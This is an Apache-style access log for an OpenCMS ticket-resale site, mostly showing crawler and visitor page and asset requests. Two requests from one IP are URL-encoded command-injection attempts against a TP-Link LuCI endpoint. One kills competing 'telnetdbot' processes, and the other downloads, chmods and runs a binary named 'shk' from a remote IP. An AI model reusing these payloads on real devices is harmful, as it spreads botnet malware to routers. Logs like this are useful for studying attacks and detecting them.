66.249.72.33 - - [29/Jun/2024:00:53:24 +0200] "GET /ticket2/opencms/en/venue/?venueid=725EAA96-3504-C885-60D8-51C3C379F292 HTTP/1.1" 200 71404
40.77.167.62 - - [29/Jun/2024:00:53:25 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=950A0A24-280E-F0D0-A995-7FF7F0048AC7 HTTP/1.1" 200 86702
66.249.72.35 - - [29/Jun/2024:00:53:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
188.165.212.137 - - [29/Jun/2024:00:53:28 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/juventus/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:53:29 +0200] "GET /ticket2/opencms/de/fi/buy/?page=10&eventid=E31CD708-FD95-F485-CDCC-6597CCC5D7AD HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:53:31 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=801CF113-A3FC-13DC-B3AC-DEF94DA97078&sortorder=desc&column=section HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:53:33 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/lazio/ HTTP/1.1" 404 -
85.208.96.207 - - [29/Jun/2024:00:53:36 +0200] "GET /ticket2/opencms/fr/magazine/article?title=cristiano-ronaldo HTTP/1.1" 200 76507
188.165.241.181 - - [29/Jun/2024:00:53:38 +0200] "GET /ticket2/opencms/de/fi/musikaalit/ HTTP/1.1" 404 -
85.208.96.210 - - [29/Jun/2024:00:53:38 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/english-championship/stoke/ HTTP/1.1" 200 73725
188.165.212.137 - - [29/Jun/2024:00:53:41 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/lecce/ HTTP/1.1" 404 -
52.167.144.184 - - [29/Jun/2024:00:53:46 +0200] "GET /ticket2/opencms/dk/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=5A89E483-58AD-080E-F363-E16CE738916A HTTP/1.1" 200 82787
188.165.212.137 - - [29/Jun/2024:00:53:47 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/milan/ HTTP/1.1" 404 -
114.119.145.239 - - [29/Jun/2024:00:53:47 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=92971269-2FFE-3DDA-49A2-724A87B9C001 HTTP/1.1" 200 88019
37.187.94.3 - - [29/Jun/2024:00:53:50 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8054D099-C7E0-390E-CDF0-AF2BBBE8D3BE HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:53:50 +0200] "GET /ticket2/opencms/de/fi/urheilu/ HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:53:59 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/monza/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:54:01 +0200] "GET /ticket2/opencms/de/fi/urheilu/moottoriurheilu/Formula-1/ HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:54:05 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8054D099-C7E0-390E-CDF0-AF2BBBE8D3BE&sortorder=asc&column=section HTTP/1.1" 404 -
47.128.28.4 - - [29/Jun/2024:00:54:06 +0200] "GET /ticket2/opencms/no/buy/?catid=3A7AEA37-903D-9533-4B33-21B0001FF1D1&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=7 HTTP/1.1" 200 83081
47.128.28.4 - - [29/Jun/2024:00:54:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.28.4 - - [29/Jun/2024:00:54:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.28.4 - - [29/Jun/2024:00:54:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.28.4 - - [29/Jun/2024:00:54:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.28.4 - - [29/Jun/2024:00:54:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.28.4 - - [29/Jun/2024:00:54:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.28.4 - - [29/Jun/2024:00:54:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.46.53 - - [29/Jun/2024:00:54:08 +0200] "GET /ticket2/opencms/dk/buy/?catid=06324577-7173-BAB0-146D-E644C912F7C1&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 82272
47.128.46.53 - - [29/Jun/2024:00:54:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.46.53 - - [29/Jun/2024:00:54:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.46.53 - - [29/Jun/2024:00:54:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.46.53 - - [29/Jun/2024:00:54:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.46.53 - - [29/Jun/2024:00:54:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.46.53 - - [29/Jun/2024:00:54:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.46.53 - - [29/Jun/2024:00:54:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
188.165.241.181 - - [29/Jun/2024:00:54:11 +0200] "GET /ticket2/opencms/de/fi/urheilu/tennis/ HTTP/1.1" 404 -
51.222.253.5 - - [29/Jun/2024:00:54:15 +0200] "GET /ticket2/opencms/dk/buy/?page=10&eventid=0AB9ED07-4372-B1CD-6D1D-CE254F1D7262&venueid=6D8A0FE7-2FEF-4BDE-AC7E-1937EABDAEF4 HTTP/1.1" 200 73215
188.165.212.137 - - [29/Jun/2024:00:54:19 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/napoli/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:54:21 +0200] "GET /ticket2/opencms/de/nl/sport/voetbal-tickets/premier_league/emirates-cup.html HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:54:27 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8054D099-C7E0-390E-CDF0-AF2BBBE8D3BE&sortorder=desc&column=row HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:54:32 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/roma/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:54:32 +0200] "GET /ticket2/opencms/de/sv/buy/ HTTP/1.1" 404 -
114.119.138.151 - - [29/Jun/2024:00:54:35 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=A77D4A9A-572B-6875-CF0A-71BAB849C655 HTTP/1.1" 200 86923
95.163.255.193 - - [29/Jun/2024:00:54:41 +0200] "GET /ticket2/opencms/ru/sport/football/premier_league/manchester_united/ HTTP/1.1" 500 -
188.165.212.137 - - [29/Jun/2024:00:54:43 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/salernitana/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:54:45 +0200] "GET /ticket2/opencms/de/sv/buy/?comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 404 -
47.128.121.27 - - [29/Jun/2024:00:54:46 +0200] "GET /ticket2/opencms/nl/buy/?edid=1B1B1FC4-4D35-11C5-5D85-DF2C3A11720F HTTP/1.1" 200 71077
47.128.121.27 - - [29/Jun/2024:00:54:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
47.128.121.27 - - [29/Jun/2024:00:54:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.121.27 - - [29/Jun/2024:00:54:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.121.27 - - [29/Jun/2024:00:54:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.121.27 - - [29/Jun/2024:00:54:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.121.27 - - [29/Jun/2024:00:54:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.121.27 - - [29/Jun/2024:00:54:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.121.27 - - [29/Jun/2024:00:54:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
37.187.94.3 - - [29/Jun/2024:00:54:50 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8058FDE5-4461-375B-C015-38BD2918BE83 HTTP/1.1" 404 -
85.208.96.193 - - [29/Jun/2024:00:54:54 +0200] "GET /ticket2/opencms/de/sport/fussball-tickets/la_liga/villareal/ HTTP/1.1" 200 76571
141.98.83.197 - - [29/Jun/2024:00:54:57 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560for+proc_dir+in+%252Fproc%252F%255B0-9%255D%252A%253B+do+pid%253D%2524%257Bproc_dir%2523%2523%252A%252F%257D%253B+buffer%253D%2524%2528cat+%2522%252Fproc%252F%2524pid%252Fmaps%2522%2529%253B+if+%255B+%2522%2524%257B%2523buffer%257D%2522+-gt+1+%255D%253B+then+if+%255B+%2522%2524%257Bbuffer%2523%252A%2522%252Flib%252F%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D+%2526%2526+%255B+%2522%2524%257Bbuffer%2523%252A%2522telnetdbot%2522%257D%2522+%253D+%2522%2524buffer%2522+%255D%253B+then+kill+-9+%2522%2524pid%2522%253B+fi%253B+fi%253B+done%2560) HTTP/1.1" 404 -
141.98.83.197 - - [29/Jun/2024:00:54:57 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560cd+%252Ftmp%253B+rm+-rf+shk%253B+wget+http%253A%252F%252F45.148.10.78%252Fshk%253B+chmod+777+shk%253B+.%252Fshk+tplink%253B+rm+-rf+shk%2560) HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:54:58 +0200] "GET /ticket2/opencms/de/sv/buy/?comcatid=66708183-7480-3365-06BF-DBF60280AB45 HTTP/1.1" 404 -
47.128.63.43 - - [29/Jun/2024:00:55:04 +0200] "GET /ticket2/opencms/fi/venue/?venueid=CA49AB1D-436E-22F2-9DD7-D243FFB8DE30 HTTP/1.1" 200 72932
47.128.63.43 - - [29/Jun/2024:00:55:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.63.43 - - [29/Jun/2024:00:55:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.63.43 - - [29/Jun/2024:00:55:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.63.43 - - [29/Jun/2024:00:55:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.63.43 - - [29/Jun/2024:00:55:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.63.43 - - [29/Jun/2024:00:55:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.63.43 - - [29/Jun/2024:00:55:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
188.165.212.137 - - [29/Jun/2024:00:55:09 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/sassuolo/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:55:12 +0200] "GET /ticket2/opencms/de/sv/buy/?comcatid=810BB404-4103-77F2-A6C2-12D5E6C338E2 HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:55:12 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=8058FDE5-4461-375B-C015-38BD2918BE83&sortorder=desc&column=price HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:55:20 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/torino/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:55:25 +0200] "GET /ticket2/opencms/de/sv/buy/?comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 404 -
66.249.75.107 - - [29/Jun/2024:00:55:26 +0200] "GET /ticket2/opencms/en/venue/?venueid=99F349EB-97D3-4327-F972-D173DD5F2DAA HTTP/1.1" 200 71290
51.222.253.9 - - [29/Jun/2024:00:55:27 +0200] "GET /ticket2/opencms/sv/about/press HTTP/1.1" 200 73779
37.187.94.3 - - [29/Jun/2024:00:55:31 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=80CD54A8-8D66-74B3-86DD-1F8C811A44BC&sortorder=asc&column=price HTTP/1.1" 404 -
185.191.171.2 - - [29/Jun/2024:00:55:33 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/english-championship/hull/ HTTP/1.1" 200 73677
188.165.212.137 - - [29/Jun/2024:00:55:33 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/udinese/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:55:39 +0200] "GET /ticket2/opencms/de/sv/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 404 -
52.167.144.184 - - [29/Jun/2024:00:55:41 +0200] "GET /ticket2/opencms/dk/buy?page=1&edid=e8ba54cc-b112-3d61-be02-1b4d1e4f63d1 HTTP/1.1" 200 31
188.165.212.137 - - [29/Jun/2024:00:55:46 +0200] "GET /ticket2/opencms/de/no/sport/fotballsbilletter/serie_a/verona/ HTTP/1.1" 404 -
185.191.171.9 - - [29/Jun/2024:00:55:51 +0200] "GET /ticket2/opencms/fr/sport/billets-football/premier_league/liverpool/ HTTP/1.1" 200 85737
188.165.241.181 - - [29/Jun/2024:00:55:51 +0200] "GET /ticket2/opencms/de/sv/buy/?comcatid=B41CCF2B-5558-7AEE-3602-09BBDE417D65 HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:55:54 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=80EE9861-CE07-B7DE-A3DB-A6E5C8995BA8 HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:00:55:56 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:00:55:59 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
52.167.144.184 - - [29/Jun/2024:00:56:00 +0200] "GET /ticket2/opencms/en/venue/?venueid=55299A70-277E-39AD-746B-1A3BED684DD4 HTTP/1.1" 200 71344
47.128.63.70 - - [29/Jun/2024:00:56:00 +0200] "GET /ticket2/opencms/es/buy/?catid=4B941E1B-E4E2-C53E-C693-9FA91BBA9AD5&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83509
47.128.63.70 - - [29/Jun/2024:00:56:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.63.70 - - [29/Jun/2024:00:56:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.63.70 - - [29/Jun/2024:00:56:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.63.70 - - [29/Jun/2024:00:56:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.63.70 - - [29/Jun/2024:00:56:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.63.70 - - [29/Jun/2024:00:56:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.63.70 - - [29/Jun/2024:00:56:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
188.165.241.181 - - [29/Jun/2024:00:56:04 +0200] "GET /ticket2/opencms/de/sv/buy/?page=1&edid=00D90EDA-80F2-743F-0F4B-D64BDD1F85D9 HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:56:11 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=81C43494-E044-CAD1-6388-497B66514F97 HTTP/1.1" 404 -
103.241.53.181 - - [29/Jun/2024:00:56:12 +0200] "GET /ticket2/opencms/en/venue/?venueid=161C816B-5393-87DD-7C00-0A52E6B6AAA6 HTTP/1.1" 200 71416
188.165.212.137 - - [29/Jun/2024:00:56:15 +0200] "GET /ticket2/opencms/de/no/sport/motor/ HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:56:17 +0200] "GET /ticket2/opencms/de/sv/buy/?page=1&edid=02717DFD-516F-F288-43FD-93598E319E97 HTTP/1.1" 404 -
40.77.167.55 - - [29/Jun/2024:00:56:19 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 91208
188.165.212.137 - - [29/Jun/2024:00:56:26 +0200] "GET /ticket2/opencms/de/no/sport/motor/formel_1/ HTTP/1.1" 404 -
66.249.75.106 - - [29/Jun/2024:00:56:28 +0200] "GET /ticket2/opencms/fi/buy/?page=1&edid=3289C097-2261-9433-8644-DF033A9EE354 HTTP/1.1" 200 117945
37.187.94.3 - - [29/Jun/2024:00:56:31 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=822B676A-490F-AE0C-4C60-AE451F58A5CC&sortorder=asc&column=row HTTP/1.1" 404 -
188.165.241.181 - - [29/Jun/2024:00:56:33 +0200] "GET /ticket2/opencms/de/sv/buy/?page=1&edid=1260CE5D-7BE1-B121-0CBF-652705BD383D HTTP/1.1" 404 -
51.222.253.20 - - [29/Jun/2024:00:56:40 +0200] "GET /ticket2/opencms/en/venue/?venueid=C26446A4-8872-48CD-CA86-62157D64B3E9 HTTP/1.1" 200 71338
188.165.212.137 - - [29/Jun/2024:00:56:43 +0200] "GET /ticket2/opencms/de/no/standard/ HTTP/1.1" 404 -
185.191.171.3 - - [29/Jun/2024:00:56:44 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/english-championship/charlton_athletic/ HTTP/1.1" 200 71927
188.165.241.181 - - [29/Jun/2024:00:56:46 +0200] "GET /ticket2/opencms/de/sv/buy/?page=1&edid=155A8AD9-1DB8-C195-1912-F1BA2EAEC8CF HTTP/1.1" 404 -
37.187.94.3 - - [29/Jun/2024:00:56:46 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=824820CC-CEE0-C33E-47FE-80B69B5E3BC0&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.51.196 - - [29/Jun/2024:00:56:56 +0200] "GET /ticket2/opencms/fi/venue/?venueid=A3B71C1B-E926-B112-21C1-4B4246731BD7 HTTP/1.1" 200 72941
47.128.51.196 - - [29/Jun/2024:00:56:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
188.165.241.181 - - [29/Jun/2024:00:56:57 +0200] "GET /ticket2/opencms/de/sv/buy/?page=1&edid=194D64DE-E32A-EF63-082C-5D0B8F236DDA HTTP/1.1" 404 -
188.165.212.137 - - [29/Jun/2024:00:56:57 +0200] "GET /ticket2/opencms/de/no/terms_of_service/ HTTP/1.1" 404 -
47.128.51.196 - - [29/Jun/2024:00:56:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.51.196 - - [29/Jun/2024:00:56:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.51.196 - - [29/Jun/2024:00:56:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.51.196 - - [29/Jun/2024:00:56:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.51.196 - - [29/Jun/2024:00:56:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.51.196 - - [29/Jun/2024:00:56:58 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
37.187.94.3 - - [29/Jun/2024:00:57:02 +0200] "GET /ticket2/opencms/dk/dk/buy/?page=1&edid=826E42A9-9C40-F4E5-43B6-73588814B12F&sortorder=asc&column=section HTTP/1.1" 404 -
47.128.111.7 - - [29/Jun/2024:00:57:04 +0200] "GET /ticket2/opencms/nl/buy/?edid=FCEB71A3-C27D-C49F-469F-2CB5939452EE HTTP/1.1" 200 71077
47.128.111.7 - - [29/Jun/2024:00:57:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.111.7 - - [29/Jun/2024:00:57:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.111.7 - - [29/Jun/2024:00:57:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.111.7 - - [29/Jun/2024:00:57:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.111.7 - - [29/Jun/2024:00:57:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.111.7 - - [29/Jun/2024:00:57:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.111.7 - - [29/Jun/2024:00:57:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
40.77.167.49 - - [29/Jun/2024:00:57:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737
40.77.167.49 - - [29/Jun/2024:00:57:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3978
188.165.212.137 - - [29/Jun/2024:00:57:11 +0200] "GET /ticket2/opencms/de/sv/buy/?comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&catid=1DB7F66B-473B-B427-F752-358FEEFE8EC0 HTTP/1.1" 404 -
40.77.167.15 - - [29/Jun/2024:00:57:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923
40.77.167.15 - - [29/Jun/2024:00:57:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
40.77.167.15 - - [29/Jun/2024:00:57:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175
40.77.167.15 - - [29/Jun/2024:00:57:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
40.77.167.15 - - [29/Jun/2024:00:57:12 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
31.192.197.154 - - [29/Jun/2024:00:57:17 +0200] "GET /ticket2/opencms/set_aff_cookie.jsp?partner=53673ED6-1455-FA54-818F-B1F67121E37C&url=/sv/buy/index.html%3Fpage%3D1%26edid%3D6AEAF6C2-C57A-0447-5B0A-20959D8DCFDD%26hlv%3D666cb1ac-8cfc-4d37-9e3a-43210a01000f%23v_1905683882 HTTP/1.1" 200 226
31.192.197.154 - - [29/Jun/2024:00:57:17 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=6AEAF6C2-C57A-0447-5B0A-20959D8DCFDD&hlv=666cb1ac-8cfc-4d37-9e3a-43210a01000f HTTP/1.1" 200 116101
31.192.197.154 - - [29/Jun/2024:00:57:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
31.192.197.154 - - [29/Jun/2024:00:57:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
31.192.197.154 - - [29/Jun/2024:00:57:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/calendar.css HTTP/1.1" 200 6871
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery-ui.css HTTP/1.1" 200 33221
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229
31.192.197.154 - - [29/Jun/2024:00:57:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338
